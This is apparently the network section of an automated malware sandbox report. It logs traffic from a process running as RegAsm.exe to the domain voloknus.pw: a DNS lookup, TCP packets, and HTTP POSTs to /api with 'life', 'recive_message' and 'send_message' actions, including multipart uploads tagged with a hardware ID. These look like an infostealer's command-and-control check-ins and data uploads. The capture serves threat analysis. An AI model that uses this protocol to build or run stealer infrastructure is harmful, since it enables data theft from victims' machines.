Nov 7, 2023 15:21:45.850950956 CET	80	49740	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:45.851624966 CET	80	49740	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.199678898 CET	80	49740	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.199706078 CET	80	49740	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.199831009 CET	49740	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.201453924 CET	49740	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.213545084 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.366799116 CET	80	49741	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.366913080 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.367185116 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.368789911 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.519898891 CET	80	49741	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.520853043 CET	80	49741	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.801822901 CET	80	49741	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.801847935 CET	80	49741	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.801978111 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.808062077 CET	49741	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.846409082 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.999546051 CET	80	49742	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:46.999835014 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:46.999975920 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.000890017 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.152441978 CET	80	49742	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.153309107 CET	80	49742	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.487495899 CET	80	49742	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.487510920 CET	80	49742	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.487667084 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.491255999 CET	49742	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.509047985 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.661365032 CET	80	49743	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.661511898 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.662266970 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.664716959 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:47.815670013 CET	80	49743	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:47.817188978 CET	80	49743	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.145910025 CET	80	49743	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.145932913 CET	80	49743	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.146014929 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.147861004 CET	49743	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.156236887 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.308455944 CET	80	49744	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.308573961 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.308851004 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.309473038 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.460855007 CET	80	49744	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.461549997 CET	80	49744	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.785731077 CET	80	49744	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.785818100 CET	80	49744	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.785888910 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.787555933 CET	49744	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.805521011 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.961060047 CET	80	49745	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:48.961122036 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.961400032 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:48.962121010 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:49.113503933 CET	80	49745	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:49.114150047 CET	80	49745	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:49.401158094 CET	80	49745	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:49.401192904 CET	80	49745	104.21.84.113	192.168.2.8
Nov 7, 2023 15:21:49.401273966 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:49.407517910 CET	49745	80	192.168.2.8	104.21.84.113
Nov 7, 2023 15:21:57.622950077 CET	49707	80	192.168.2.8	104.21.84.113

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2023 15:21:08.194220066 CET	65248	53	192.168.2.8	1.1.1.1
Nov 7, 2023 15:21:08.356538057 CET	53	65248	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 7, 2023 15:21:08.194220066 CET	192.168.2.8	1.1.1.1	0xf29a	Standard query (0)	voloknus.pw	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 7, 2023 15:21:08.356538057 CET	1.1.1.1	192.168.2.8	0xf29a	No error (0)	voloknus.pw		104.21.84.113	A (IP address)	IN (0x0001)	false
Nov 7, 2023 15:21:08.356538057 CET	1.1.1.1	192.168.2.8	0xf29a	No error (0)	voloknus.pw		172.67.191.144	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

voloknus.pw

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.8	49706	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:08.518591881 CET	1	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 8 Host: voloknus.pw
Nov 7, 2023 15:21:08.518640041 CET	1	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Nov 7, 2023 15:21:08.995186090 CET	2	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=n9h5p00rdrhfb34pcevf4p79r0; expires=Sat, 02 Mar 2024 08:07:47 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:08 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=690awv5ueSw%2FgXaZgc%2FqZKkAubR5f035leXlv9g5JxDJz19TpTBpaiBC0dQsttkqJcmN2kc5PYQn%2B3G7Zeu0WGK8WPq%2BrsyW1%2BYtO3Ba8t1mdk9UXPFdJ3jYtcSJ7w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82263890cc226c89-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:08.995218992 CET	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Nov 7, 2023 15:21:10.249763966 CET	15	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:10.250430107 CET	15	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:10.676335096 CET	16	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=d8mhodbdauhuc0g8r9lrmbdleg; expires=Sat, 02 Mar 2024 08:07:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BEhIDCPr0t18%2BLz6f5KR06DF8Y70SPVP2nzFADooBp36oSp1RtZ2Wkuzb2qeNm2fSnwyROm3fkHW4M%2FcjGDiitxWVT%2BucNi2OgAlOhsokd7k5Kgk5cY8vHw6LSzshQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226389baaaa6c89-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:10.676403999 CET	16	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.8	49707	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:09.706614017 CET	3	OUT	POST /api HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Host: voloknus.pw Content-Length: 78 Cache-Control: no-cache Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 45 45 45 52 48 68 2d 2d 73 65 68 31 26 6a 3d 34 64 62 61 63 65 39 31 32 35 34 66 64 36 34 65 36 31 31 65 37 32 64 30 34 38 31 61 65 39 62 63 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=EEERHh--seh1&j=4dbace91254fd64e611e72d0481ae9bc&ver=4.0
Nov 7, 2023 15:21:10.188783884 CET	4	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=p5ltsqvjfv3nit4bim3n0pakbj; expires=Sat, 02 Mar 2024 08:07:49 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:10 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MzcXypxCqrutZ6v%2FiiINfAVUyRFw8e6AmzX0brVAoxjCelpoDK6Dzt4E4%2BePcXAdDsKm%2FjWSdu486RS%2BECf5uuIIGPMh4dT9VrT%2FxW3JKi0OwN7GjpxfEQOa%2BgZtPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638983d9fc4d4-SEA Data Raw: 32 35 65 34 0d 0a 61 66 67 38 6b 2b 5a 73 36 41 65 55 42 37 39 56 62 75 69 43 65 63 4f 73 54 79 30 56 62 6e 35 6c 76 34 38 43 52 42 4f 4d 39 45 73 53 32 6b 71 78 33 46 6a 45 4a 65 64 69 6e 57 38 49 69 65 34 4b 70 6f 42 74 54 48 46 4d 52 41 50 65 34 33 45 68 50 36 36 52 4d 30 76 43 5a 2b 6a 45 43 59 59 6c 72 69 58 61 50 77 79 4a 37 68 75 69 78 79 42 64 65 51 30 57 43 64 6a 6e 5a 79 64 33 37 5a 67 6d 44 4a 31 5a 38 6f 77 43 67 57 72 38 61 70 31 35 54 49 33 34 57 2f 6d 4f 41 6b 68 68 44 7a 4d 45 7a 4f 51 Data Ascii: 25e4afg8k+Zs6AeUB79VbuiCecOsTy0Vbn5lv48CRBOM9EsS2kqx3FjEJedinW8Iie4KpoBtTHFMRAPe43EhP66RM0vCZ+jECYYlriXaPwyJ7huixyBdeQ0WCdjnZyd37ZgmDJ1Z8owCgWr8ap15TI34W/mOAkhhDzMEzOQ
Nov 7, 2023 15:21:10.188854933 CET	5	IN	Data Raw: 67 4f 54 2f 33 31 69 34 48 32 67 61 78 69 41 65 4b 62 76 78 68 33 54 41 42 6a 2b 4d 63 6f 73 4d 71 52 58 6b 4c 47 41 76 55 34 47 59 6d 64 75 71 54 4f 77 36 54 55 76 33 45 51 4d 70 69 37 69 57 46 64 79 4f 4e 39 68 69 4f 7a 54 78 47 4e 78 4e 53 48 Data Ascii: gOT/31i4H2gaxiAeKbvxh3TABj+McosMqRXkLGAvU4GYmduqTOw6TUv3EQMpi7iWFdyON9hiOzTxGNxNSHp3qbGYprpEsA5FY+YQcj2v9ZNcxDYfsHaHPLUl7DBsAz/9lIGPk1mdLnUax3E68deF0y3U5ie4VpthtUDkVXADRrThmeu6aLgOcWvmLAYN392nTJQuK6RWuwiRCcAEXDdDpZycxoNYuE9oGsbIeh2nYbtE+TJWuAu
Nov 7, 2023 15:21:10.188894987 CET	7	IN	Data Raw: 69 34 50 6e 46 47 78 79 6b 36 4e 66 62 59 39 6e 52 67 72 76 36 49 36 6d 34 34 79 41 57 35 4d 47 77 75 64 74 53 41 71 63 75 4b 65 4a 67 32 54 55 76 75 4e 42 59 5a 75 38 6d 6e 55 4d 67 71 4c 35 52 36 67 79 69 46 46 63 51 38 66 43 4e 4c 69 61 47 59 Data Ascii: i4PnFGxyk6NfbY9nRgrv6I6m44yAW5MGwudtSAqcuKeJg2TUvuNBYZu8mnUMgqL5R6gyiFFcQ8fCNLiaGY/rpExS8Ie1JMFhGO2epMuTI3sW/mOIUZxChkL3OtoI3nqly8NmVH1gQ+FYfpr1zYNhusUqsttATcLBEeFrVElZ/mGJUuFEOjECYYlriXcJQaA7h6uyy5AcAEaC9fkaCB+54QqB5RZ/4gAh2/1aJ15TI34W/mOAUh6
Nov 7, 2023 15:21:10.188934088 CET	8	IN	Data Raw: 31 67 67 48 4b 4b 37 5a 69 78 58 64 55 79 73 38 63 74 4f 38 58 44 32 68 43 42 55 66 61 34 53 42 2b 4d 65 53 64 4c 51 69 65 57 2f 36 46 44 34 78 33 38 57 7a 50 4f 51 47 46 36 42 4f 6f 7a 79 6c 4b 65 67 6f 51 44 64 7a 71 62 69 68 35 72 74 68 70 44 Data Ascii: 1ggHKK7ZixXdUys8ctO8XD2hCBUfa4SB+MeSdLQieW/6FD4x38WzPOQGF6BOozylKegoQDdzqbih5rthpDIIeqcQvmn7kc9AWAYWgBO/XbUh7TERH1P9kK2PnkScEmUzwiQWYYvlh2jsKheYapMQhSHIHEwudoyAhaa7OaSWRTeaHAIFz7SXCeRXK5xfhlm1MfAcYB9HtZCtx/JkuDJNV444JjW7+btIxHobuCaTcPw85TBsfnb
Nov 7, 2023 15:21:10.188976049 CET	9	IN	Data Raw: 2f 68 71 33 54 45 48 69 2b 55 59 71 73 51 6a 52 6d 56 4d 55 6b 66 61 39 53 42 2b 4d 63 53 4e 4b 41 61 57 48 4e 2b 50 47 49 30 6e 31 32 76 57 4d 41 43 63 6f 41 54 76 31 32 31 49 65 30 78 45 52 39 54 6a 62 43 56 32 35 70 34 73 43 35 46 65 2f 6f 34 Data Ascii: /hq3TEHi+UYqsQjRmVMUkfa9SB+McSNKAaWHN+PGI0n12vWMACcoATv121Ie0xER9TjbCV25p4sC5Fe/o4AjXf8adclA4ntH6zEKEZlCRUBnaMgIWmuzmkzkVDDhxXKerh8nTAAyrhboskuTn0FEAja6XIsdvyXKACXUvGJA4Bk/2jROguN7x7hgG1Ib0xER/zgayoqtNY2RYMe9ohO0iX2b9g9AYnvGLPPK113ARYV1+ZlK3zj
Nov 7, 2023 15:21:10.189013958 CET	11	IN	Data Raw: 55 79 72 68 62 6c 4d 30 6a 51 58 41 61 44 55 72 36 2b 32 6f 68 59 65 6d 42 4a 6b 76 55 48 76 66 45 56 74 6b 72 74 6d 48 4d 64 31 54 61 73 6b 44 30 6e 58 6f 66 4a 52 4e 53 48 70 33 37 49 48 34 6a 6f 4e 59 37 53 38 49 65 74 6f 63 63 6d 47 50 31 63 Data Ascii: UyrhblM0jQXAaDUr6+2ohYemBJkvUHvfEVtkrtmHMd1TaskD0nXofJRNSHp37IH4joNY7S8IetoccmGP1c95wMrTHAazIOl5JMhsd0Ot3Nz37lScFnUixyk6FJa5cnX9Mta5buY51D0IPEgna+3FrVvSbLxyLHr/ECMo9piudMx3KuEvzlXgcIFxOGJP0IDAxtsRnS4geqcRJiXfkY94hD83eJY/JK0pwHF4p1vlnZj+umWlTox
Nov 7, 2023 15:21:10.189052105 CET	12	IN	Data Raw: 73 41 6a 53 47 45 64 58 45 6d 64 34 69 42 2b 53 4b 37 65 61 54 54 55 48 75 6e 45 56 73 70 51 39 57 76 54 4d 42 71 62 72 54 79 76 79 53 78 5a 5a 78 73 54 52 35 4f 74 5a 6d 59 70 76 74 68 70 44 34 73 65 71 64 52 63 30 54 43 6c 4d 6f 31 6c 45 38 54 Data Ascii: sAjSGEdXEmd4iB+SK7eaTTUHunEVspQ9WvTMBqbrTyvySxZZxsTR5OtZmYpvthpD4seqdRc0TClMo1lE8T5W7eOdRw5TA5Hha0nKHzvlScIiEz3hxiJIshb+DoBj+4cn/AMRWcBEwDj01c3dv7UDwiMXbHKTpIlriX8PRyH7xzh0WNWNxpcX4+jIDQxttZuCIhM94cYiSLIW/47F6znCqiOYw94TEQ+naUsJ3zikmk01B7pxFbK
Nov 7, 2023 15:21:10.189090967 CET	14	IN	Data Raw: 4c 44 41 53 66 77 57 63 72 66 61 36 4a 5a 78 4c 61 53 4c 48 63 58 63 51 6c 35 43 57 46 64 30 75 4a 38 67 6d 6e 7a 54 74 4d 4d 44 49 69 4b 73 2f 71 63 43 55 7a 33 35 73 74 48 59 39 64 34 59 4d 77 74 45 6a 6b 59 73 30 30 54 71 2f 61 57 5a 44 59 4c Data Ascii: LDASfwWcrfa6JZxLaSLHcXcQl5CWFd0uJ8gmnzTtMMDIiKs/qcCUz35stHY9d4YMwtEjkYs00Tq/aWZDYLk95C1xJnfUgfjHDhC4bmRzUvky7c/Vl0zBMla4C4dhtFyRCXBWdtSBhf+OXKgWZTOOCDZxmsVvjGAeL8BawwylZSTI7AdjqXhhG/5E5Sbxd54dOxCXuJYV3K4zlHOHRY1Y3GlxfjqMgNDG21m4Fl1/yig2Yd/Bmyz
Nov 7, 2023 15:21:10.189136028 CET	14	IN	Data Raw: 57 5a 6d 4b 62 2f 59 61 51 2b 4c 48 71 6e 55 58 4e 45 77 70 54 4b 4e 5a 52 50 45 2b 56 75 33 6a 6e 55 64 4f 55 77 4f 52 34 57 74 51 58 35 50 30 4b 51 47 4b 4c 46 77 73 63 70 4f 68 53 57 75 58 4a 31 2f 51 4b 76 4d 4e 4f 47 41 62 51 63 37 50 6a 4d Data Ascii: WZmKb/YaQ+LHqnUXNEwpTKNZRPE+Vu3jnUdOUwOR4WtQX5P0KQGKLFwscpOhSWuXJ1/QKvMNOGAbQc7PjMjnaMgbj3cuQVL1B65yDylS7YrnX8tqcExhoIfYDdCXE+R2FIJMaDWYUeocbHKTsIpwVTtdzPEoAPhlm1gdAcSRfzjayF9+IdkOZ1b8pUZmyW4Jdt3VNuuW6XfbRcnXkdSjrowdG6gj2kd2gajyk6YJa4lmjkBi+MV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.8	49716	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:16.055195093 CET	37	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:16.055929899 CET	38	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:16.534603119 CET	39	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=1h43o4orblqto2eh3u112mf2tn; expires=Sat, 02 Mar 2024 08:07:55 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:16 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KqQegg6VnC2T2ycK%2Bt14SdaxaGDxkIj0xGmvopFNKTekxqjJI5MTro9WMb%2FOCuzBdLM%2FMVUmL0O1LxbvVsFgdPvAGInSkPxeE6%2Bt4%2F8HfgPCT%2BsrKIlnwCRz7Mp5Mw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638bfef006ce5-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:16.534672976 CET	39	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.8	49717	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:16.697803020 CET	40	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:16.698369026 CET	41	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:17.196544886 CET	42	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=cf57l0b6m76sls2tvcj6ff6160; expires=Sat, 02 Mar 2024 08:07:56 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:17 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=y7ewhhbfm%2BLCXJegRoy75Ldfi0h2fMNbWmJWVJ7e8lO3gDIcDX3cCiX4eIUWgyK%2BHC0q6aEQywgEpw%2FYUkOuZogQuHMMneak%2B8ZXhFzUbYCMBkgOfNRqH40gpriNjQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638c3ec940903-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:17.196573973 CET	42	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.8	49718	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:17.645179033 CET	43	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 16558 Host: voloknus.pw
Nov 7, 2023 15:21:17.645911932 CET	54	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
